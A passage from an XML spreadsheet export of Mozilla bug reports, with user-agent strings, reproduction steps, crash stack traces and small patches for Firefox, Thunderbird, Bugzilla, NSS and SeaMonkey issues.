    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5
Right click any of the links on the page and see how the page restructures itself.
Reproducible: Always
Steps to Reproduce:
1. Right mouse click on a link
2. Right mouse click on a link
3. Right mouse click on a link
etc.</t>
  </si>
  <si>
    <t>tuimonen</t>
  </si>
  <si>
    <t>CALENDAR-421329</t>
  </si>
  <si>
    <t>Freebusy information is not loaded for multiday events beginning previous to look-up date</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.11) Gecko/20071128 Iceweasel/2.0.0.11 (Debian-2.0.0.11-1)
Build Identifier: Thunderbird (Icedove) 2.0.0.9 (20080128) / Lightning 0.7
I have a multi-day event beginning March 8 and ending March 15 and mark it as busy. I create another event and view freebusy information. If the event is on or before March 8 the the entire block is marked busy. However if the new event is after March 8 the multi-day block is marked free.
Reproducible: Always
Steps to Reproduce:
1. Create a multi-day event and mark it busy.
2. Create another event after the start day of the multi-day event but before the end day.
3. Go to invite attendees.
Actual Results:  
Time for multi-day event is not marked busy.
Expected Results:  
Time should be marked busy.
I'm using eGroupWare which publishes freebusy information for this event (which crosses DST boundary) as follows:
FREEBUSY:20080308T060000Z/20080316T045959Z
Testing with 0.7 but this doesn't appear to be fixed in 0.8 yet either.</t>
  </si>
  <si>
    <t>lmarcotte</t>
  </si>
  <si>
    <t>pgoerzen</t>
  </si>
  <si>
    <t>BUGZILLA-467701</t>
  </si>
  <si>
    <t>USAGE_MODE_CMDLINE should be the default if not i_am_cgi()</t>
  </si>
  <si>
    <t>If we're not in a CGI Bugzilla-&gt;usage_mode should default to USAGE_MODE_CMDLINE not USAGE_MODE_BROWSER. Then we wouldn't have to explicitly set USAGE_MODE_CMDLINE in our command-line scripts.</t>
  </si>
  <si>
    <t>BUGZILLA-298273</t>
  </si>
  <si>
    <t>Marking duplicates misses 'Bug' before the number</t>
  </si>
  <si>
    <t>If I dupe a bug there are two messages inserted:
*** Bug 298141 has been marked as a duplicate of this bug. ***
*** This bug has been marked as a duplicate of 297725 ***
2nd message should be:
*** This bug has been marked as a duplicate of Bug 297725 ***
Reason: the message gives a bad example to people reading and writing comments.
If you write in a comment simply '297725' that number doesnÂ´t get linkified.
If you write in a comment 'bug 297725' that entry gets linkified you see the
summary of the bug if you hover over the link so you donÂ´t have to follow the
link to see the summary.
end of bug rant following:
I hate comments using numbers only as I have to do some action to follow the
bug. Normally I use some other bug already open and replace it's number with the
new bugnumber or I donÂ´t follow if the bug is of little interest.
Tinderbox linkifies each and every number so developers are used to omitting
'Bug' and the result can be seen in Bugzilla.
Other people are writing about 'bugs 123456 and 234567' and that numbers also
donÂ´t get linkified.
I`m missing a short help at a prominent place 'Howto refer to bugnumbers and
comments'
Tell people that 'comment n' refers to the n'th comment in this bug that
comment 0 is the original comment opening the bug and refering to a comment in
another bug must be written as 'bug 123 comment 2'
I also would like if attachments get numbered like comments belonging to a bug
so if an attachment is used as testcase in another bug you know were it came from.</t>
  </si>
  <si>
    <t>CORE-384679</t>
  </si>
  <si>
    <t>Trailing whitespace ignored in font names</t>
  </si>
  <si>
    <t xml:space="preserve">
.a {font-family: Arial\a\9\20}
b
This font gets recognized as Arial however I don't think I have a font on my system that has a name with a tab or a newline in it.
Not sure if this is a style system bug it might be a GFX issue.</t>
  </si>
  <si>
    <t>SEAMONKEY-192835</t>
  </si>
  <si>
    <t>Useless Button</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3b) Gecko/20030210
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3b) Gecko/20030210
After going into fullscreen mode either by menu or by hitting F11 there is a
minimize button on the toolbar - left over from the previous fullscreen display
mode that was implemented in Mozilla 1.2x - that does absoloutly nothing.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>millionaire317</t>
  </si>
  <si>
    <t>FIREFOX-384503</t>
  </si>
  <si>
    <t>Bookmarks service crashes destroying a PRLock</t>
  </si>
  <si>
    <t>Mano says this stack could happen if the service fails to initialize.</t>
  </si>
  <si>
    <t>CORE-145309</t>
  </si>
  <si>
    <t>[turbo] On exit after unloading accts we are again loading accts because we are rebuilding tree</t>
  </si>
  <si>
    <t>waterson I'm assigning this bug to you. You can reassign it back to me if 
you are not the right owner. 
To reproduce this bug.
1. you need the patch. I'll attach it.
2. Launch mail.
3. Go in turbo mode
4. File |  Exit
Acutal : After unloading accts xulTreeBuilder is again rebuilding tree on exit
Expected: We should not be rebuilding tree after session-logout notification
nsMsgAccountManager::LoadAccounts(nsMsgAccountManager * const 0x0304adc8) line 
1300
nsMsgAccountManager::GetAllServers(nsMsgAccountManager * const 0x0304adc8 
nsISupportsArray * * 0x0012d780) line 1243 + 12 bytes
nsMsgAccountManagerDataSource::createRootResources(nsIRDFResource * 0x01dee0b0 
nsISupportsArray * 0x030f35f0) line 597 + 47 bytes
nsMsgAccountManagerDataSource::GetTargets(nsMsgAccountManagerDataSource * const 
0x03cb7ca0 nsIRDFResource * 0x0304c120 nsIRDFResource * 0x01dee0b0 int 1 
nsISimpleEnumerator * * 0x031db3e8) line 574 + 21 bytes
CompositeAssertionEnumeratorImpl::GetEnumerator(nsIRDFDataSource * 0x03cb7ca0 
nsISimpleEnumerator * * 0x031db3e8) line 573 + 37 bytes
CompositeEnumeratorImpl::HasMoreElements(CompositeEnumeratorImpl * const 
0x031db3d8 int * 0x0012db88) line 239 + 22 bytes
nsRDFConMemberTestNode::FilterInstantiations(InstantiationSet &amp; {...} void * 
0x0012e018) line 389 + 42 bytes
TestNode::Propagate(const InstantiationSet &amp; {...} void * 0x0012e018) line 1044 
+ 19 bytes
TestNode::Propagate(const InstantiationSet &amp; {...} void * 0x0012e018) line 1054
RootNode::Propagate(const InstantiationSet &amp; {...} void * 0x0012e018) line 760 
+ 30 bytes
nsXULTreeBuilder::OpenSubtreeOf(nsTreeRows::Subtree * 0x00000000 nsIRDFResource 
* 0x0012e094 int * 0x001a2667) line 1615
nsXULTreeBuilder::OpenContainer(int 3080192 nsIRDFResource * 0x02ff0c88) line 
1569
nsXULTreeBuilder::Rebuild(nsXULTreeBuilder * const 0x002f0000) line 1075
nsXULTreeBuilder::SetTree(nsXULTreeBuilder * const 0x002f0000 nsITreeBoxObject 
* 0xc0000000) line 834
nsTreeBoxObject::SetDocument(nsTreeBoxObject * const 0x00000040 nsIDocument * 
0x00000010) line 87
nsXULDocument::SetBoxObjectFor(nsXULDocument * const 0x00000020 nsIDOMElement * 
0x00130560 nsIBoxObject * 0x00130560) line 6887
nsXULElement::SetDocument(nsXULElement * const 0x03c47628 nsIDocument * 
0x0534da00 int 3080192 int 15) line 2066
nsXULElement::SetDocument(nsXULElement * const 0x40000003 nsIDocument * 
0x00000000 int 1244420 int 3080192) line 2134
nsXULElement::SetDocument(nsXULElement * const 0x000000fe nsIDocument * 
0xc0000000 int 2012951904 int 3081736) line 2134
nsXULElement::SetDocument(nsXULElement * const 0x0012fdf0 nsIDocument * 
0x002f0000 int 3080896 int 2012842704) line 2134
nsXULDocument::SetScriptGlobalObject(nsXULDocument * const 0x00000000 
nsIScriptGlobalObject * 0x77fb80db) line 1635
DocumentViewerImpl::Close(DocumentViewerImpl * const 0x00000000) line 1621
nsDocShell::Destroy(nsDocShell * const 0x77fb80db) line 2713
nsWebShell::Destroy(nsWebShell * const 0x0012e7bc) line 1264
nsXULWindow::Destroy(nsXULWindow * const 0x00000000) line 396
nsWebShellWindow::Destroy(nsWebShellWindow * const 0x77fca4cb) line 1739 + 9 
bytes
nsChromeTreeOwner::Destroy(nsChromeTreeOwner * const 0x03c294b8) line 230
GlobalWindowImpl::ReallyCloseWindow(GlobalWindowImpl * const 0x002f0000) line 
3030
GlobalWindowImpl::CloseWindow(nsISupports * 0x77fa6c29) line 4167
nsJSContext::ScriptEvaluated(nsJSContext * const 0x77f902ed int 304) line 1477 
+ 18 bytes
nsJSContext::CallEventHandler(nsJSContext * const 0x0012e8d8 void * 0x0012e8d4 
void * 0x0012e890 unsigned int 268461183 void * 0x0012e8d4 int * 0x0012e89c 
int 268462239) line 1050
nsJSEventListener::HandleEvent(nsJSEventListener * const 0x00000005 nsIDOMEvent 
* 0x0012ea54) line 182 + 77 bytes
nsEventListenerManager::HandleEventSubType(nsListenerStruct * 0x0012ec34 
nsIDOMEvent * 0x0012ec34 nsIDOMEventTarget * 0x0012ec30 unsigned int 1240020 
unsigned int 269143112) line 1219 + 20 bytes
nsEventListenerManager::HandleEvent(nsEventListenerManager * const 0x002f0000 
nsIPresContext * 0x77fcb30b nsEvent * 0x0398dbb0 nsIDOMEvent * * 0x00001250 
nsIDOMEventTarget * 0xfeeefeee unsigned int 52902984 nsEventStatus * 
0x77fcc85a) line 2209 + 36 bytes
nsXULElement::HandleDOMEvent(nsXULElement * const 0x00000001 nsIPresContext * 
0x005bfd6c nsEvent * 0x00010001 nsIDOMEvent * * 0x00000000 unsigned int 
2012971227 nsEventStatus * 0x02f58440) line 3447
PresShell::HandleDOMEventWithTarget(PresShell * const 0x77e94c28 nsIContent * 
0xffffffff nsEvent * 0x0012f424 nsEventStatus * 0x0012f2fc) line 6033 + 36 
bytes
nsMenuFrame::Execute() line 1679
nsMenuFrame::HandleEvent(nsMenuFrame * const 0xffffffff nsIPresContext * 
0x0012f59c nsGUIEvent * 0x0019dfc4 nsEventStatus * 0x002f0000) line 486
PresShell::HandleEventInternal(nsEvent * 0x01f26148 nsIView * 0x77f902bd 
unsigned int 2012807917 nsEventStatus * 0x00000060) line 6001 + 38 bytes
PresShell::HandleEvent(PresShell * const 0x0012f62c nsIView * 0x03604f0f 
nsGUIEvent * 0x02fb1db0 nsEventStatus * 0x0012f6e0 int 1242900 int &amp; 
-13597301) line 5909 + 25 bytes
nsViewManager::HandleEvent(nsView * 0x03603522 nsGUIEvent * 0x00000104 int 
32661824) line 2076
nsView::HandleEvent(nsViewManager * 0x03610703 nsGUIEvent * 0x00000f3c int 
1032357892) line 306
nsViewManager::DispatchEvent(nsViewManager * const 0x02ff06c0 nsGUIEvent * 
0x0012f8cc nsEventStatus * 0x0012f7c8) line 1881 + 23 bytes
HandleEvent(nsGUIEvent * 0x0012f801) line 83
nsWindow::DispatchEvent(nsWindow * const 0x00000001 nsGUIEvent * 0x020364c4 
nsEventStatus &amp;) line 889 + 10 bytes
nsWindow::DispatchWindowEvent(nsGUIEvent * 0x03ebf4fc) line 910
nsWindow::DispatchMouseEvent(unsigned int 3080192 unsigned int 32661824 
nsPoint * 0x00000000) line 4754 + 21 bytes
ChildWindow::DispatchMouseEvent(unsigned int 2012773192 unsigned int 32661824 
nsPoint * 0x002f0000) line 5011
nsWindow::ProcessMessage(unsigned int 805462114 unsigned int 5 long 0 long * 
0x00302960) line 3624 + 28 bytes
nsWindow::WindowProc(HWND__ * 0x0012fd1c unsigned int 268966609 unsigned int 
3109320 long 0) line 1154 + 27 bytes
USER32! 77e13eb0()
USER32! 77e1401a()
USER32! 77e192da()
nsAppShellService::Run(nsAppShellService * const 0x01800fd8) line 451
main1(int 4 char * * 0x003047d0 nsISupports * 0x00000000) line 1456 + 32 bytes
main(int 4 char * * 0x003047d0) line 1805 + 37 bytes
mainCRTStartup() line 338 + 17 bytes
KERNEL32! 77e87903()</t>
  </si>
  <si>
    <t>MOZILLA.ORG-492930</t>
  </si>
  <si>
    <t xml:space="preserve">SVN Account Request - Mike Lee </t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Build Identifier: 
Hi there
I'd like to request an LDAP account and SVN write access to /addons/branches/webmocha. I'll be sending my Committer's Agreement shortly. Much thanks!
---- BEGIN SSH2 PUBLIC KEY ----
Comment: rsa-key-20090514
AAAAB3NzaC1yc2EAAAABJQAAAIEA2BSmW6KzlcdkRxp7jjLfB5YWDQgnC9OlV7UW
IrfRUFcjc5RrG5AEtKVpJBSSyWBGEDHSu8HObTJQn5FHFukvEykFsTzLdlZ12B++
VoMQ6s+C2IYzKwn5huyPYS8oG+tGMmkXL5CetEvA8ucOOq5wcdK/FEJ1N+K/QlI7
tXrFMGE=
---- END SSH2 PUBLIC KEY ----
Reproducible: Always</t>
  </si>
  <si>
    <t>mikelee</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-369843</t>
  </si>
  <si>
    <t>rename Mozilla Localizations: fr-FR / French to fr / French</t>
  </si>
  <si>
    <t>It turns out that the localization is not fr-FR (this is a carry over from suite when it was) but fr [generic].
I suggest also changing the description.
I'm told that:
France Belgium Canada Switzerland Luxembourg and a bunch of African countries have French listed in their official languages.
(See list at )
I'm going to tentatively choose one of Standard French or Regular French.
People are encouraged to toss out a descriptive string. I won't do this before Sunday.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-470650</t>
  </si>
  <si>
    <t>IMAP capability response ignored in greeting after authentication</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1b3pre) Gecko/20081220 Shiretoko/3.1b3pre
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-GB rv:1.9.1b3pre) Gecko/20081204 Thunderbird/3.0b1
Quota support and Sharing support with Cyrus-IMAPd v2.3.13 worked flawlessly in 3.0a3 (Shredder).
In 3.0b1 it now says that this server does not support quotas and this server does not support shared folders in the Quota tab of mailbox properties on any mailbox held on a Cyrus-IMAPd server.
This is tested against Cyrus IMAP v2.3.13.
It still appears to work against an older Cyrus IMAP v.2.2.12.
I have tried this in safe mode and with a new profile no change in results.
Please can it be fixed again this is very important to my users. I will happily provide support to any developer who can help fix this problem.
Reproducible: Always
Steps to Reproduce:
1. Set up account talking to IMAP server running Cyrus v.2.3.13.
2. Right-click on a folder.
3. Choose Properties.
4. Choose Quota tab or Sharing tab.
Actual Results:  
Dialog just shows the text this server does not support quotas or this server does not support shared folders.
Expected Results:  
Should get display of folder permissions or amount of quota used just like in 3.0a3.
My IMAP servers are publicly acessible and I will happily give a developer an account on both the old v.2.2 server and the new v2.3 server to test against.
I am the postmaster and so will help out as much as possible.</t>
  </si>
  <si>
    <t>jkf</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-641745</t>
  </si>
  <si>
    <t>Update data.sql in graphserver for new SeaMonkey 2.1 Branch</t>
  </si>
  <si>
    <t>Created attachment 519326
Add Them
This is to get reviews on the graph server stuff.
Diffed/patched against |1.0| branch |default| is missing the data.sql and |production| appears unused at the moment.
If any of my assumptions here are wrong feel free to tell me.</t>
  </si>
  <si>
    <t>SEAMONKEY-213897</t>
  </si>
  <si>
    <t>Order Received column is not sortable</t>
  </si>
  <si>
    <t>You should be able to sort by the order received column in the thread pane.
Taking this for thunderbird and the trunk.</t>
  </si>
  <si>
    <t>SEAMONKEY-34159</t>
  </si>
  <si>
    <t>building dbm separately</t>
  </si>
  <si>
    <t>I have patches which will allow dbm to be built separately (as NSS will need)
and as part of the entire mozilla build.
I have a context diff and a tar file of additional files (basically
build+config stuff for dbm).  I have tested these diffs+files on unix and NT. 
To do a full mozilla build with these changes nothing special or different
needs to be done.  To build just dbm on unix merely check out mozilla/dbm and
./configure as usual.  To build just dbm on NT check out mozilla/dbm set
INCS=-I and go nmake /f makefile.win .</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-453349</t>
  </si>
  <si>
    <t>Stack-only checker skips any conditional blocks</t>
  </si>
  <si>
    <t>Created attachment 336530
Walk stack conditionals correctly rev. 1
I found out to my horror that the current stack-only checker completely skips conditional blocks. This is because by the time we hit gimplification and the CFG pass the COND_EXPR if/else blocks are empty (see bug 451412).
Instead I am now running this at the process_cp_pre_genericize level which actually makes the analysis easier. There will be a dehydra patch and a mozilla patch.</t>
  </si>
  <si>
    <t>NSS-53133</t>
  </si>
  <si>
    <t>Need conversion of T61String data from ISO8859 to UTF8</t>
  </si>
  <si>
    <t>RFC2459 suggests that applications convert data encoded using T61String from 
ISO8859-1 (Latin 1) encoding to UTF8.  This is suggested because some 
applications (IE?) used T61String as a place to put 8-bit Latin character sets.
This suggestion isn't strictly correct since T61 actually uses escape sequences 
to represent a variety of different character values.  However the current 
implementation of T61String in NSS doesn't convert those either.
We should:
  1. Allow T61String to be treated as ISO8859-1 (optionally?)
  2. Implement true T61 handling
Of these the first is more important and if it is the only choice implemented 
means that applications don't need to make a decision.</t>
  </si>
  <si>
    <t>BUGZILLA-413184</t>
  </si>
  <si>
    <t>Unify all of the update_ functions in Bugzilla::Bug</t>
  </si>
  <si>
    <t>While we were re-writing process_bug we had to create several different update_ functions that added things to the database at different times. Now that we're all done we can unify them all into update().</t>
  </si>
  <si>
    <t>CORE-487601</t>
  </si>
  <si>
    <t>Crash [@ nsTextStateManager::Init] contenteditable and onfocus removing window</t>
  </si>
  <si>
    <t>Created attachment 371839
testcase
See testcase which crashes current trunk build on load.
To see this crash you need to have the intl.enable_tsf_support pref set to true.
It doesn't crash in a 2009-02-09 build it does crash in a 2009-02-11 build. I think a regression from bug 88831.
The iframe content consists of this:
document.getElementById('a').focus()
http://crash-stats.mozilla.com/report/index/40e52958-f61c-40e8-a3aa-0c3bd2090409?p=1
0  	xul.dll  	nsTextStateManager::Init  	 content/events/src/nsIMEStateManager.cpp:369
1 	xul.dll 	xul.dll@0x3553f3 	
2 	xul.dll 	nsEventStateManager::PreHandleEvent 	content/events/src/nsEventStateManager.cpp:1252
3 	xul.dll 	PresShell::HandleEventInternal 	layout/base/nsPresShell.cpp:6127
4 	xul.dll 	PresShell::HandleEvent 	layout/base/nsPresShell.cpp:5931
5 	xul.dll 	nsViewManager::DispatchEvent 	view/src/nsViewManager.cpp:1325
6 	xul.dll 	HandleEvent 	view/src/nsView.cpp:167
7 	xul.dll 	nsWindow::DispatchEvent 	widget/src/windows/nsWindow.cpp:919
8 	xul.dll 	nsWindow::DispatchWindowEvent 	widget/src/windows/nsWindow.cpp:939
9 	xul.dll 	nsWindow::DispatchFocus 	widget/src/windows/nsWindow.cpp:6601
10 	xul.dll 	nsWindow::ProcessMessage 	widget/src/windows/nsWindow.cpp:4767
11 	xul.dll 	nsWindow::WindowProc 	widget/src/windows/nsWindow.cpp:1135
12 	user32.dll 	InternalCallWinProc 	
13 	user32.dll 	UserCallWinProcCheckWow 	
14 	user32.dll 	DispatchClientMessage 	
15 	user32.dll 	__fnDWORD 	
16 	ntdll.dll 	KiUserCallbackDispatcher 	
17 	xul.dll 	nsGenericHTMLElement::UpdateEditableState 	
18 	xul.dll 	nsEventStateManager::SendFocusBlur 	content/events/src/nsEventStateManager.cpp:5510
19 	xul.dll 	nsEventStateManager::SetContentState 	content/events/src/nsEventStateManager.cpp:5091
20 	xul.dll 	nsGenericElement::SetFocus 	content/base/src/nsGenericElement.cpp:3068
21 	xul.dll 	nsGenericHTMLElement::SetElementFocus 	content/html/content/src/nsGenericHTMLElement.cpp:2961
22 	xul.dll 	nsHTMLInputElement::Focus 	content/html/content/src/nsGenericHTMLElement.cpp:2987
23 	xul.dll 	nsGenericHTMLElementTearoff::Focus 	content/html/content/src/nsGenericHTMLElement.cpp:189
24 	xul.dll 	NS_InvokeByIndex_P 	xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp:101
25 	xul.dll 	XPCWrappedNative::CallMethod 	js/src/xpconnect/src/xpcwrappednative.cpp:2480</t>
  </si>
  <si>
    <t>BUGZILLA-455583</t>
  </si>
  <si>
    <t>Bugzilla::User::can_{setrequest}_flag  methods should use the respective {grantrequest}_group_id values instead of loading new Group object</t>
  </si>
  <si>
    <t>Created attachment 338931
Patch to use flag group ids in Bugzilla/User.pm (v1)
To save on extra database calls that are used when $user-&gt;can_request_flag and $user-&gt;can_set_flag methods are called simply use the grant_group_id and request_group_id values that are already loaded. This way initializing the group objects for Bugzilla::FlagType::{requestgrant}_group methods are unnecessary for that functionality. If multiple flags have different group ids associated with them then a new group object would have to be loaded for each resulting in extra database calls.
Patch attached.
Dave</t>
  </si>
  <si>
    <t>CORE-246474</t>
  </si>
  <si>
    <t>deCOMtaminate SVG</t>
  </si>
  <si>
    <t>Tracker bug. Please set any bugs relating to the deCOMtamination of the SVG code
to block this bug.</t>
  </si>
  <si>
    <t>FIREFOX-338252</t>
  </si>
  <si>
    <t>sourceTextEncoding attribute isn't parsed correctly in all cases (certain Sherlock plugins don't display correctly)</t>
  </si>
  <si>
    <t>If the sourceTextEncoding attribute in a Sherlock file has a space after the equals sign it fails to parse and the file's encoding isn't recognized.
We should keep the byte array around until we start the actual parsing and then re-convert later if we see a sourceTextEncoding attribute. That way we can avoid regex hacks and just use the normal Sherlock attribute parser to parse sourceTextEncoding.</t>
  </si>
  <si>
    <t>CORE-88078</t>
  </si>
  <si>
    <t>XMLHttpRequest only accepts HTTP URIs</t>
  </si>
  <si>
    <t>Heikki and I discussed the issue of loading XML from an arbitrary source. The
nsIXMLHttpRequest interface despite its name should be able to load XML
documents from non-HTTP URIs. While sending XML documents may only be possible
for protocols that have a POST-type mechanism actual loading should be possible
from file: and chrome: URIs. In fact IE's XMLHttpRequest object supports
file-based loading.</t>
  </si>
  <si>
    <t>CORE-444322</t>
  </si>
  <si>
    <t>Firefox 3 onload and DOMContentLoaded event firing before the page is fully loaded.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9) Gecko/2008061004 Firefox/3.0
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9) Gecko/2008061004 Firefox/3.0
We were finally able to isolate the behavior to a few lines of html and javascript (see the welcome.jsp discussed later). The faulty behavior occurs more often when the complexity of the page increases however the welcome.jsp demonstrates the problem quite well if you let it run for a while. After the welcome.jsp is loaded the javascript will load the return_to_welcome.jsp which is identical but it redirects back to welcome.jsp. When the resource loading goes bad it will throw up an alert saying it cannot find the clock widget. The clock widget is a widget provided by dojo. We are using dojo 0.4.
We added logging to the javascript and this is displayed on the page when resource loading goes bad:
WELCOME
LOGGER RESULTS
BEGIN dojo.js.uncompressed.js
Adding dj_load_init() to DOMContentLoaded Event
END dojo.js.uncompressed.js
-------------------
BEGIN INLINE SCRIPT
-------------------
Before dojo.require(dojo.widget.Clock)
Begin dj_load_init(). (Triggered from EVENT: domcontentloaded)
dojo.hostenv.makeWidgets() Called
dojo.hostenv.makeWidgets() Ended
Begin dj_load_init(). (Triggered from EVENT: load)
After dojo.require(dojo.widget.Clock)
Before dojo.addOnLoad(init)
init() Called
EXPECTED RESULTS
-------------------------------------------------------------------------
BEGIN dojo.js.uncompressed.js
Adding dj_load_init() to DOMContentLoaded Event
END dojo.js.uncompressed.js
-------------------
BEGIN INLINE SCRIPT
------------------
Before dojo.require(dojo.widget.Clock)
After dojo.require(dojo.widget.Clock)
Before dojo.addOnLoad(init)
After dojo.addOnLoad(init)
-------------------
END INLINE SCRIPT
-------------------
Begin dj_load_init(). (Triggered from EVENT: domcontentloaded)
dojo.hostenv.makeWidgets() Called
dojo.hostenv.makeWidgets() Ended
init() Called
init() Finished
You can run the example at:
http://www.vodafonegroup.eu:8080/jsp-ex ... elcome.jsp
If you want I can tar up the war file or even the complete tomcat.
The logging clearly shows that the onLoad event is fired *BEFORE* all the javascript has been loaded. The issue is most easily reproducible on windows (we used both win2k and xp in a VM) but we've also seen it on OSX. However for the example code provided we could only make it happen on windows. All runs fine in FF2 or IE6+. We used a clean FF3 with no plugins.
BTW it is key to use a jsp and *not* static HTML or else the browser figures out that it can cache the entire page and the issue will not surface. Sometimes the issue will issue on the first load sometimes it will take a few minutes..
Another maybe related issue is that we sometimes see that CSS is not loaded. I also actually see this quite often when I go to www.cnn.com with ff3.
BTW in FF2 you can actually see the clock widget on the welcome.jsp not so in ff3.
You can actually see from the bad results (the first set) that the dj_load_init() method is triggerd TWICE before the end of the inline script is run. Looking closely you can see that the DomContentLoaded event and the window onload event both fired prematurely.
In addtion the the dj_load_init() method is only registered as a listener for DomContentLoaded -- not the window.onload event.
Reproducible: Sometimes
Steps to Reproduce:
We found the smallest amount of html/javascript that still demonstrates the behavior to make it easier to understand the issue. The downside is that it happens less frequently. To reproduce just load up 
http://www.vodafonegroup.eu:8080/jsp-examples/ff3/welcome.jsp
and see it alternating between this page and the return_to_welcome.jsp page. 
After a while an alert pops up saying Could not find Clock!!! This is when the onLoad event has fired prematurely.
Actual Results:  
You get the alert and our logging output appears on the screen
WELCOME
LOGGER RESULTS
BEGIN dojo.js.uncompressed.js
Adding dj_load_init() to DOMContentLoaded Event
END dojo.js.uncompressed.js
-------------------
BEGIN INLINE SCRIPT
-------------------
Before dojo.require(dojo.widget.Clock)
Begin dj_load_init(). (Triggered from EVENT: domcontentloaded)
dojo.hostenv.makeWidgets() Called
dojo.hostenv.makeWidgets() Ended
Begin dj_load_init(). (Triggered from EVENT: load)
After dojo.require(dojo.widget.Clock)
Before dojo.addOnLoad(init)
init() Called
EXPECTED RESULTS
-------------------------------------------------------------------------
BEGIN dojo.js.uncompressed.js
Adding dj_load_init() to DOMContentLoaded Event
END dojo.js.uncompressed.js
-------------------
BEGIN INLINE SCRIPT
------------------
Before dojo.require(dojo.widget.Clock)
After dojo.require(dojo.widget.Clock)
Before dojo.addOnLoad(init)
After dojo.addOnLoad(init)
-------------------
END INLINE SCRIPT
-------------------
Begin dj_load_init(). (Triggered from EVENT: domcontentloaded)
dojo.hostenv.makeWidgets() Called
dojo.hostenv.makeWidgets() Ended
init() Called
init() Finished
Expected Results:  
It should load the entire page BEFORE firing onLoad
The problem seems to be most prevalent on windows. We can send you server side code on request.
This issue is causing major havoc on our site which is heavily web2.0. And when the javascript loading breaks it leaves the site pretty much broken. We see this issue in ff3 only (tested ff2+ IE6/7 Safari).
See also forum entry:
http://forums.mozillazine.org/viewtopic.php?f=38&amp;p=3774055</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-440129</t>
  </si>
  <si>
    <t>PHP notices on homepage</t>
  </si>
  <si>
    <t>If an add-on in the right sidebar doesn't have a category associated with it it will display a notice instead.
Notice: Undefined offset: 0 in /private/var/www/addons/trunk/site/app/views/addons/home.thtml on line 160
(above notice for the Newest section - might be different line number for other sections)</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-300298</t>
  </si>
  <si>
    <t>Simple local folder filter marks processed messages as junk</t>
  </si>
  <si>
    <t>Using either SM (2005070506) or TB (20050510) on Winx XP SP2
Steps to reproduce
1. On Local folders create a filter that labels certain messages as say personal
2. Make sure messages that match filter are not currently marked as junk
3. Run filter on a folder which has some messages that match filter
4. Look at junk status of matched messages
Expected results
1. All matched messages are not marked as junk
Actual results
1. All matched messages are marked as junk
This does not always happen the first time you run the filter but on subsequent
runs it does always happen.
There is a slight difference in what happens with TB and SM too. If you have
more than one filter defined then on TB it only marks those matched in the
first listed filter as junk not those in subsequent filters. On SM it does it
for all filters.</t>
  </si>
  <si>
    <t>NSS-52404</t>
  </si>
  <si>
    <t>*BSD needs to have cuserid() defined in nss/lib/ssl/sslsocks.c</t>
  </si>
  <si>
    <t>The BSD family has no cuserid defined. There is a define for BSDI that fixes
this problem but not for other family members. The following page also (by
wtc's suggestion) rename bsdi_cuserid to just cuserid.
 Here is the build breakage:
/usr/lib/libc.so: warning: tempnam() possibly used unsafely consider using
mkstemp()
../../../../dist/FreeBSD5.0_OPT.OBJ/lib/libssl.a(sslsocks.o): In function
`ssl_SocksConnect':
sslsocks.o(.text+0xb4c): undefined reference to `cuserid'
../../../../dist/FreeBSD5.0_OPT.OBJ/lib/libssl.a(sslsocks.o): In function
`ssl_SocksBind':
sslsocks.o(.text+0xd52): undefined reference to `cuserid'
gmake[2]: *** [FreeBSD5.0_OPT.OBJ/selfserv] Error 1
gmake[2]: Leaving directory `/usr/src/moz-crypto/mozilla/security/nss/cmd/selfserv'
gmake[1]: *** [libs] Error 2
gmake[1]: Leaving directory `/usr/src/moz-crypto/mozilla/security/nss/cmd'
patch:
--- sslsocks.orig       Wed Sep 13 01:22:53 2000
+++ sslsocks.c  Wed Sep 13 01:26:09 2000
@@ -71210 +71210 @@
 /* BSDI ain't got no cuserid() */
-#ifdef __386BSD__
+#if defined(__386BSD__) || defined(__FreeBSD__)
 #include 
 char *
-bsdi_cuserid(char *b)
+cuserid(char *b)
 {
     struct passwd *pw = getpwuid(getuid())
@@ -78511 +7857 @@
     if (!direct) {
        /* Find user */
 #ifdef XP_UNIX
-#ifdef __386BSD__
-       user = bsdi_cuserid(NULL)
-#else
        user = cuserid(NULL)
-#endif
        if (!user) {
            PORT_SetError(PR_UNKNOWN_ERROR)
            SSL_DBG((%d: SSL[%d]: cuserid fails errno=%d
@@ -91111 +9077 @@
        /* Find user */
 #ifdef XP_UNIX
-#ifdef __386BSD__
-       user = bsdi_cuserid(NULL)
-#else
        user = cuserid(NULL)
-#endif
        if (!user) {
            SSL_DBG((%d: SSL[%d]: cuserid fails errno=%d
                     SSL_GETPID() ss-&gt;fd PORT_GetError()))</t>
  </si>
  <si>
    <t>tstromberg</t>
  </si>
  <si>
    <t>CORE-295195</t>
  </si>
  <si>
    <t>Using extension Spellbound 0.7.3 choosing option Recheck Page causes a crash [@  GetScopeOfObject f4e69a55 ]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050522 Firefox/1.0+
